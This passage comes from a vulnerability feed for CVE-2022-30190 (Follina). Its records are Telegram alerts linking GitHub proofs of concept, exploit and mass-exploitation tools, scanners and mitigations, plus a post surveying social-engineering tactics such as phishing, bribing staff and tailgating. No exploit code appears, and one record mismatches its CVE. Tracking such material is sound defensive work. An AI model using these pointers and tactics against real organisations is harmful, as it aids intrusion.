"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2363", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aProof of Concept zu MSDT-Follina - CVE-2022-30190. 
\u00dcBERPR\u00dcFUNG DER WIRKSAMKEIT VON MICROSOFT DEFNEDER IN DER JEWEILS AKTUELLSTEN WINDOWS 10 VERSION.\nURL\uff1ahttps://github.com/ImproveCybersecurityJaro/2022_PoC-MSDT-Follina-CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-01T23:12:47.000000Z"}, {"uuid": "3693d8ab-153c-4bdd-943f-421f8a9e27cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2378", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 | MS-MSDT Follina One Click\nURL\uff1ahttps://github.com/AchocolatechipPancake/MS-MSDT-Office-RCE-Follina\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T22:59:39.000000Z"}, {"uuid": "777a2422-e630-4f06-ab73-1f54158253ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2377", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aPDQ Package I created for CVE-2022-30190\nURL\uff1ahttps://github.com/castlesmadeofsand/ms-msdt-vulnerability-pdq-package\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T15:37:01.000000Z"}, {"uuid": "7a6aa9f4-44b4-455b-af1c-23f6185c85e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2329", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190- A Zero-Click RCE Vulnerability 
In MSDT\nURL\uff1ahttps://github.com/kdk2933/msdt-follina-office\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-05-31T17:59:12.000000Z"}, {"uuid": "0e695757-b03a-4943-9044-5862004d13ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2328", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aPicking up processes that have triggered ASR related to CVE-2022-30190\nURL\uff1ahttps://github.com/DOV3Y/CVE-2022-30190-ASR-Senintel-Process-Pickup\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-05-31T16:14:34.000000Z"}, {"uuid": "b87861ad-3fa5-412a-a66d-725cafa51f31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2474", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aRepository containing the compromised certificate seen in recent CVE-2022-30190 (Follina) attacks.\nURL\uff1ahttps://github.com/b401/Clickstudio-compromised-certificate\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-09T10:07:52.000000Z"}, {"uuid": "29293b38-533b-4ed8-b5c3-7b01c3374508", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2497", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 : CVE 0-day MS Offic RCE aka msdt follina 
\nURL\uff1ahttps://github.com/safakTamsesCS/PicusSecurity4.Week.Repo\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-12T20:51:23.000000Z"}, {"uuid": "2dbcae90-089f-4424-aa91-06f0d0e1d3bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2492", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aproof of concept to CVE-2022-30190 (follina)\nURL\uff1ahttps://github.com/AmitNiz/follina_cve_2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-11T15:52:13.000000Z"}, {"uuid": "5866d95c-5477-4613-9628-43aa0dc4028d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2600", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 powerpoint version\nURL\uff1ahttps://github.com/Gra3s/CVE-2022-30190-Follina-PowerPoint-Version\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-29T09:15:48.000000Z"}, {"uuid": "c1822157-6881-466e-9c6c-e68aa33e81b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2751", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aDetection and Remdiation of  the Follina MSDT Vulnerability (CVE-2022-30190)\nURL\uff1ahttps://github.com/EkamSinghWalia/Follina-MSDT-Vulnerability-CVE-2022-30190-\n\n\u6807\u7b7e\uff1a#CVE-2022", 
"creation_timestamp": "2022-07-21T07:26:21.000000Z"}, {"uuid": "9ab94737-5845-43b1-a5c3-78c08734e73d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2325", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190  Follina POC\nURL\uff1ahttps://github.com/onecloudemoji/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-05-31T06:51:55.000000Z"}, {"uuid": "78020955-bba2-478d-8d8d-b1e0517247f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2853", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aA Fullstack Academy Cybersecurity project examining the full cycle of the Follina (CVE-2022-30190) vulnerability, from exploit to detection and defense.\nURL\uff1ahttps://github.com/jeffymcjeffface/five-nights-at-follina-s\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-08-05T02:37:51.000000Z"}, {"uuid": "a58c4790-0744-4ca5-9b6d-13ab98ae1cbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2355", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aAn NSIS script that helps deploy and roll back the mitigation registry patch for CVE-2022-30190 as recommended by Microsoft\nURL\uff1ahttps://github.com/rouben/CVE-2022-30190-NSIS\n\n\u6807\u7b7e\uff1a#CVE-2022", 
"creation_timestamp": "2022-06-01T19:05:58.000000Z"}, {"uuid": "38d9e479-dea2-4c0a-bb43-b8a8d2094309", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2343", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 Zero click rce Mass Exploitation Tool with Multi threading capabilities\nURL\uff1ahttps://github.com/Kesinger57/CVE-2022-30190-mass\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-01T09:38:46.000000Z"}, {"uuid": "17447392-e9ce-4883-bfc5-1ae66287c7e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2342", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aFollina MS-MSDT 0-day MS Office RCE (CVE-2022-30190) PoC in Go\nURL\uff1ahttps://github.com/dwisiswant0/gollina\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-01T09:28:12.000000Z"}, {"uuid": "990233c4-fb7c-4d0c-bd8e-9fcb192c361f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2456", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMicrosoft Support Diagnostic Tool (CVE-2022-30190)\nURL\uff1ahttps://github.com/joshuavanderpoll/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-07T10:21:21.000000Z"}, {"uuid": "e221e627-9788-4948-836e-13df4592ff95", 
"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2473", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aExploit Microsoft Zero-Day Vulnerability Follina (CVE-2022-30190)\nURL\uff1ahttps://github.com/Hrishikesh7665/Follina_Exploiter_CLI\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-09T09:37:06.000000Z"}, {"uuid": "ff5a96c7-d2fb-4d2c-9546-8aaa81508d3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2337", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 remediation via removal of ms-msdt from Windows registry\nURL\uff1ahttps://github.com/PaddlingCode/cve-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-05-31T23:41:30.000000Z"}, {"uuid": "d4ebccbc-d828-4181-9675-523d35525bee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3240", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aImplementation of CVE-2022-30190 in C\nURL\uff1ahttps://github.com/mattjmillner/CVE-Smackdown\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-11-10T18:21:26.000000Z"}, {"uuid": "3a804d2b-9449-46de-b35f-68e7548527d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", 
"vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2521", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aThese are the source codes of the Python scripts to apply the temporary protection against the CVE-2022-30190 vulnerability (Follina)\nURL\uff1ahttps://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix_Source_Code\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-16T20:50:32.000000Z"}, {"uuid": "554f8051-ef5e-4260-a0e1-80169679bd64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2361", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 or \\\"Follina\\\" 0day proof of concept\nURL\uff1ahttps://github.com/rayorole/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-01T21:45:46.000000Z"}, {"uuid": "310c0377-88db-45db-a305-bb73619bf7db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2468", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aProof of Concept of CVE-2022-30190\nURL\uff1ahttps://github.com/Malwareman007/Deathnote\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-08T11:03:22.000000Z"}, {"uuid": "06ac6a55-762d-4a85-ba2f-dd7045964374", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": 
"https://t.me/GithubRedTeam/2506", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1awriteup and poc for [CVE-2022-26809]  CVE-2022-26809 Vulnerabillity in cre windows componen(RPC) with a high cvss score of 9.8\nURL\uff1ahttps://github.com/SonicWave21/Follina-CVE-2022-30190-Unofficial-patch\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-14T13:03:21.000000Z"}, {"uuid": "0474f625-dc6c-4e2d-ab25-1024f804fafb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2520", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aThese are two Python scripts compiled to easily and quickly apply temporary protection against the CVE-2022-30190 vulnerability (Follina)\nURL\uff1ahttps://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-16T20:34:54.000000Z"}, {"uuid": "48b5e66e-9c6b-4691-a7c0-85530ce8cdbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2358", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aRemoves the ability for MSDT to run, in response to CVE-2022-30190 (Follina)\nURL\uff1ahttps://github.com/Cosmo121/Follina-Remediation\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-01T20:38:18.000000Z"}, {"uuid": "ccb6b845-9eba-4d09-9a7a-7a66c523b3aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": 
"CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2369", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aA tool written in Go that scans files &amp; directories for the Follina exploit (CVE-2022-30190)\nURL\uff1ahttps://github.com/ErrorNoInternet/FollinaScanner\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T06:55:29.000000Z"}, {"uuid": "a9029565-1ebd-4ced-af7f-4383b0a63651", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2367", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMSDT protocol disabler (CVE-2022-30190 patch tool)\nURL\uff1ahttps://github.com/gamingwithevets/msdt-disable\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T02:49:08.000000Z"}, {"uuid": "0ed376fd-6ba1-426b-91e0-ef52c0fe923f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/GithubRedTeam/2390", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMicrosoft's recommended mitigation for CVE-2022-30190 using Powershell\nURL\uff1ahttps://github.com/hilt86/cve-2022-30190-mitigate\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-03T06:07:30.000000Z"}, {"uuid": "b295642f-ab6b-40a2-9a98-181150426736", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3463", "content": 
"GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aA Command Line based python tool for exploit Zero-Day vulnerability in MSDT (Microsoft Support Diagnostic Tool) also know as 'Follina' CVE-2022-30190.\nURL\uff1ahttps://github.com/0xAbbarhSF/FollinaXploit\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-11-23T23:02:20.000000Z"}, {"uuid": "6b0f248c-ef93-4c21-b455-013c26c08b84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/technical_private_cat/191", "content": "Part 1 - social engineering\n\nFirst I want to talk about social engineering. \nWhat is social engineering? \nIt is methods of influencing a person to do what you want him to do. \n\nBut what methods hackers use and what tools and resources do they use? \n\nThe first and most famous type I want to talk about is phishing. \nFor me phishing is divided into two types - mass and targeted (those who knows can correct). \n\"Bulk phishing\" is a kind of mass general delivery of let's say emails with malicious files, links, threat notifications etc. with some kind of general concept.  \n\nAnd directed is phishing, which is aimed at a particular person - for example, deputy director of the company. To do so, phishers first use methods a la OSINT to collect information about a target and then they compose phishing attacks.  \nTo hide an exe in any other format they use different file joyners or work with asm exe files themselves. Then they make up a more or less convincing story or just send it to the victim(s). Another example about sending documents is the infamous CVE-2022-30190, which contains exploits, see.\nWhat does it do?  
\nThis vulnerability can be exploited via a malicious MS Office document.\nWhen something goes wrong with Windows it can invoke from other applications via a special MSDT URL protocol. \nIf the vulnerability is exploited successfully, the attacker can run arbitrary code with the privileges of the application that invoked MSDT, i.e. in our case with the privileges of the user who opened the malicious file.\nSimilar vulnerability and exploit \n\nPhishing can also be done via fake websites. \nThis is also very easy to do. \nThere are phishing attempts when a hacker is already in the local network and needs to get passwords to log on to the server and download the malware. For this, most often a local attack using local dos attacks for example with pyersinia to the victim device is restarted, and the attacker could intercept the data entered. \nHere is a wireshark article about data hijacking \n\nNow let's talk about the social engineering, where the intruder must be \"present\".\nThe first thing that comes to mind is the compromise of the employees.  As they say \"the most vulnerable part of the server is the cleaner\" - Because she does not know anything about computers, the intruder can pay her and ask to insert a flash drive\ud83e\udda0 Or remember how lapsus did (asking directly the companies employees to cooperate with them) . \nEven if no one from the failed to compromise or hack, the attacker has to act himself. 
For this, a hacker can pretend to be an employee of the company, or, as I've seen somewhere, they dig through the office trash (nothing funny about it, someone does throw out passwords there); or, for example, to get into the company building, they can just confidently walk in behind someone else.\nIn general, where security is stricter, they are more likely to compromise employees or carry out other manipulations with them ...\nA little touch on how to deal with it.\nFirst of all, be more vigilant: do not open any e-mails from unknown addresses, do not click on links, check the company network for suspicious activity more often, and in general be more vigilant about everything.  Concerning the second type, how to avoid compromise, well, this is a very difficult question - probably check the employees more often. In general the topic of social engineering is quite vast and affects many areas of life, BUT I think you got the gist. If anything, I'll attach a few articles about social engineering methods below. 
\nAnd then you can move on to the next part.\n #virus #social_engineering", "creation_timestamp": "2022-09-24T08:33:34.000000Z"}, {"uuid": "3a110461-749a-4367-9669-e2e68114e013", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3636", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aProof of concept for CVE-2022-30190 (Follina).\nURL\uff1ahttps://github.com/winstxnhdw/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-12-26T21:47:18.000000Z"}, {"uuid": "efb22454-fee1-4393-af05-f3719c92830c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/technical_private_cat/184", "content": "\u0427\u0430\u0441\u0442\u044c 1 - \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u0430\u044f \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u044f\n\n\u0421\u043d\u0430\u0447\u0430\u043b\u0430 \u0445\u043e\u0447\u0443 \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u0442\u044c \u043f\u0440\u043e \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u0443\u044e \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u044e. \n\u0427\u0442\u043e \u0442\u0430\u043a\u043e\u0435 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u0430\u044f \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u044f  ? \n\u042d\u0442\u043e \u043c\u0435\u0442\u043e\u0434\u044b \u0432\u043b\u0438\u044f\u043d\u0438\u044f \u043d\u0430 \u0447\u0435\u043b\u043e\u0432\u0435\u043a\u0430 \u0447\u0442\u043e\u0431\u044b \u043e\u043d \u0441\u0434\u0435\u043b\u0430\u043b \u0442\u043e \u0447\u0442\u043e \u0431\u044b \u0445\u043e\u0447\u0435\u0448\u044c. 
\n\n\u041d\u043e \u043a\u0430\u043a\u0438\u0435 \u043c\u0435\u0442\u043e\u0434\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0445\u0430\u043a\u0435\u0440\u044b \u0438 \u043a\u0430\u043a\u0438\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u0438 \u0440\u0435\u0441\u0443\u0440\u0441\u044b \u043a \u043d\u0438\u043c \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442 ? \n\n\u041f\u0435\u0440\u0432\u044b\u0439 \u0438 \u0441\u0430\u043c\u044b\u0439 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0439 \u0432\u0438\u0434 \u043e \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u044f \u0445\u043e\u0447\u0443 \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u0442\u044c \u044d\u0442\u043e \u0444\u0438\u0448\u0438\u043d\u0433. \n\u0414\u043b\u044f \u043c\u0435\u043d\u044f \u0444\u0438\u0448\u0438\u043d\u0433 \u0434\u0435\u043b\u0438\u0442\u044c\u0441\u044f \u043d\u0430 \u0434\u0432\u0430 \u0432\u0438\u0434\u0430 - \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0439 \u0438 \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0439 (\u043a\u0442\u043e \u0448\u0430\u0440\u0438\u0442 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043f\u0440\u0430\u0432\u0438\u0442\u044c) . 
\n\"\u041c\u0430\u0441\u0441\u043e\u0432\u044b\u0439 \u0432\u0438\u0434\" \u044d\u0442\u043e \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0435 \u043e\u0431\u0449\u0438\u0435 \u0440\u0430\u0441\u0441\u044b\u043b\u043a\u0438 \u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043c \u043f\u0438\u0441\u0435\u043c \u0441 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c\u0438 \u0444\u0430\u0439\u043b\u0430\u043c\u0438 ,\u0441\u0441\u044b\u043b\u043a\u0430\u043c\u0438, \u0443\u0432\u0435\u0434\u043e\u043c\u043b\u0435\u043d\u0438\u044f\u043c\u0438 \u043e\u0431 \u0443\u0433\u0440\u043e\u0437\u0430\u0445 \u0438 \u0442\u0434 \u0441 \u043a\u0430\u043a\u043e\u0439-\u0442\u043e \u043e\u0431\u0449\u0435\u0439 \u043a\u043e\u043d\u0446\u0435\u043f\u0446\u0438\u0435\u0439.  \n\u0410 \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0439 \u044d\u0442\u043e \u0444\u0438\u0448\u0438\u043d\u0433 